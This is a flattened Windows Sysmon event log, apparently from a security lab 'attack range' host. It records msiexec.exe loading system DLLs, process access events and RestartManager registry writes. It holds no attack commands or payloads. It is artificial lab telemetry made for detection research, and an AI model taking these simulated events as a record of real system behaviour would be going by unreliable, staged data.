Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698027Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698026Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.444{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698025Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698024Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698023Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698022Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698021Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698020Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698019Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698018Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698017Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698016Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698015Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698014Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698013Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002698012Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-EE97-62A8-7E00-000000006202}18083200C:\Windows\system32\csrss.exe{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698011Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698010Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698009Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002698008Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002698007Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-EE55-62A8-0500-000000006202}396512C:\Windows\system32\csrss.exe{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002698006Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-981D-62AC-1A6B-000000006202}48403860C:\Windows\system32\msiexec.exe{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002698005Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.435{7CF983DC-9828-62AC-466B-000000006202}2536C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 4F5D5687D3E790ACEA8C2DFA6BC0C5ACC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 10341000x80000000000000002698004Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002698003Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002698002Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.428{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI5E47.tmp2022-06-17 15:05:12.428NT AUTHORITY\SYSTEM 13241300x80000000000000002698001Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:12.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002698000Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002697999Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:12.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002697998Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:12.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002697997Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002697996Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002697995Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}48403192C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-3B6B-000000006202}4244C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002697994Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002697993Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002697992Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002697991Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5149.msi2022-06-13 14:04:24.0002022-06-17 15:05:12.397NT AUTHORITY\SYSTEM 10341000x80000000000000002697990Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002697989Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002697988Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5149.msi2022-06-17 15:05:12.397NT AUTHORITY\SYSTEM 23542300x80000000000000002697987Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5149.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002697986Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.397{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5149.msi2022-06-17 15:05:12.397NT AUTHORITY\SYSTEM 534500x80000000000000002697569Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.037{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002697568Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002697567Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002697566Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002697565Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002697564Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002697563Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002697562Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002697561Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 